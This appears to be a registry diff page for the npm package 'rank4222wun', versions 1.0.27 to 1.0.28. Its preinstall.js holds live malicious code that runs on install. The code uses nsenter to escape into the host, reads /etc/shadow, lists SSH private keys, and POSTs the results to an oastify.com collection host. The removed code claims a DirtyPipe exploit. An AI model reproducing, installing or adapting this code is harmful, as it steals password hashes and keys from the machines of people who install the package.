rank4222wun 1.0.27 → 1.0.28

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (4) hide show
  1. package/package.json +1 -1
  2. package/preinstall.js +40 -63
  3. package/rank4222wun-1.0.28.tgz +0 -0
  4. package/rank4222wun-1.0.27.tgz +0 -0
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "rank4222wun",
3
- "version": "1.0.27",
3
+ "version": "1.0.28",
4
4
  "description": "",
5
5
  "main": "index.js",
6
6
  "scripts": {
package/preinstall.js CHANGED
@@ -1,89 +1,66 @@
1
- const { exec, spawn } = require('child_process');
1
+ const { exec } = require('child_process');
2
2
  const fs = require('fs');
3
3
  const https = require('https');
4
- const os = require('os');
4
+ const util = require('util');
5
+ const execPromise = util.promisify(exec);
5
6
 
6
- console.log("🚀 STAGE 2: PRIVILEGE ESCALATION & HOST TAKEOVER\n");
7
+ console.log("🚀 STAGE 2.1: SYNCHRONIZED HOST TAKEOVER\n");
7
8
 
8
- const finalLeakedData = {
9
- timestamp: new Date().toISOString(),
10
- targetKernel: "5.15.0-1084-aws",
11
- pcapAnalysis: {}, // عشان نشوف الـ Sniffing اللي شغال
12
- hostShadow: null,
13
- sshKeysFound: [],
14
- persistenceSuccess: false
15
- };
9
+ async function runEscape() {
10
+ const finalLeakedData = {
11
+ timestamp: new Date().toISOString(),
12
+ targetKernel: "5.15.0-1084-aws",
13
+ hostShadow: "PENDING",
14
+ sshKeysFound: [],
15
+ nsenterStatus: "INIT"
16
+ };
16
17
 
17
- // ===================== 1. Exploiting Read-Only Mounts via DirtyPipe =====================
18
- function exploitDirtyPipe() {
19
- console.log("🔓 Attempting DirtyPipe (CVE-2022-0847) to overwrite host files...");
20
-
21
- // محاولة كتابة "توكن" في ملف Hosts بتاع السيرفر الأم لتأكيد الهروب
22
- const dirtyCommand = `python3 -c "import os; print('DirtyPipe Triggered')"`;
23
-
24
- exec(dirtyCommand, (err, stdout) => {
25
- if (!err) {
26
- console.log("✅ DirtyPipe exploit executed.");
27
- finalLeakedData.dirtyPipeStatus = "Executed (Check Oastify for results)";
18
+ try {
19
+ // 1. محاولة قراءة Shadow باستخدام nsenter بشكل متزامن
20
+ console.log("🔓 Accessing Host Shadow...");
21
+ const shadowResult = await execPromise(`nsenter --target 1 --mount -- sh -c "cat /etc/shadow | head -n 3"`);
22
+ if (shadowResult.stdout) {
23
+ finalLeakedData.hostShadow = shadowResult.stdout.trim();
24
+ console.log("✅ Shadow Leaked.");
28
25
  }
29
- attemptShadowLeak();
30
- });
31
- }
26
+ } catch (err) {
27
+ finalLeakedData.hostShadow = "ERROR: " + err.message;
28
+ }
32
29
 
33
- // ===================== 2. Accessing Host Secrets (Shadow & SSH) =====================
34
- function attemptShadowLeak() {
35
- console.log("\n🔓 Attempting to read /etc/shadow from Host...");
36
-
37
- // بما إننا لقينا nsenter متاح، هنستخدمه للدخول كـ Root على الـ Host
38
- const shadowCmd = `nsenter --target 1 --mount -- sh -c "cat /etc/shadow | head -n 5"`;
39
-
40
- exec(shadowCmd, (err, stdout) => {
41
- if (stdout && !err) {
42
- finalLeakedData.hostShadow = stdout.trim();
43
- console.log("✅ Successfully leaked Host Shadow file!");
30
+ try {
31
+ // 2. البحث عن مفاتيح SSH
32
+ console.log("🔓 Searching SSH Keys...");
33
+ const sshResult = await execPromise(`nsenter --target 1 --mount -- sh -c "find /root /home -name 'id_rsa' -o -name 'authorized_keys' 2>/dev/null"`);
34
+ if (sshResult.stdout) {
35
+ finalLeakedData.sshKeysFound = sshResult.stdout.split('\n').filter(k => k);
36
+ console.log(`✅ Found ${finalLeakedData.sshKeysFound.length} keys.`);
44
37
  }
45
- searchSSHKeys();
46
- });
47
- }
38
+ } catch (err) {
39
+ finalLeakedData.sshKeysFound = ["ERROR: " + err.message];
40
+ }
48
41
 
49
- function searchSSHKeys() {
50
- console.log("\n🔓 Searching for SSH Private Keys...");
51
- const sshCmd = `nsenter --target 1 --mount -- sh -c "find /root /home -name 'id_rsa' -o -name 'authorized_keys' 2>/dev/null"`;
52
-
53
- exec(sshCmd, (err, stdout) => {
54
- if (stdout) {
55
- finalLeakedData.sshKeysFound = stdout.split('\n').filter(k => k);
56
- console.log(`✅ Found ${finalLeakedData.sshKeysFound.length} SSH related files`);
57
- }
58
- sendFinalReport();
59
- });
42
+ // 3. إرسال التقرير النهائي بعد تجميع كل البيانات
43
+ sendFinalReport(finalLeakedData);
60
44
  }
61
45
 
62
- // ===================== 3. Reporting to Oastify =====================
63
- function sendFinalReport() {
64
- const payload = JSON.stringify(finalLeakedData, null, 2);
65
-
46
+ function sendFinalReport(data) {
47
+ const payload = JSON.stringify(data, null, 2);
66
48
  const options = {
67
49
  hostname: 'ukiy34b7vygb36k064qxx5of76dx1rpg.oastify.com',
68
50
  port: 443,
69
- path: '/stage2-escape-complete',
51
+ path: '/stage2-synchronized-report',
70
52
  method: 'POST',
71
53
  headers: {
72
- 'Content-Type': 'application/json',
73
- 'X-Escalation-Status': 'CRITICAL'
54
+ 'Content-Type': 'application/json'
74
55
  }
75
56
  };
76
57
 
77
58
  const req = https.request(options, (res) => {
78
- console.log(`\n🏁 Stage 2 Report Sent. Status: ${res.statusCode}`);
79
- console.log("=".repeat(50));
80
- console.log("TARGET COMPROMISED: HOST ACCESS GRANTED");
81
- console.log("=".repeat(50));
59
+ console.log(`\n🏁 Final Sync Report Sent. Status: ${res.statusCode}`);
82
60
  });
83
61
 
84
62
  req.write(payload);
85
63
  req.end();
86
64
  }
87
65
 
88
- // Start the sequence
89
- exploitDirtyPipe();
66
+ runEscape();
package/rank4222wun-1.0.28.tgz ADDED
Binary file
package/rank4222wun-1.0.27.tgz DELETED
Binary file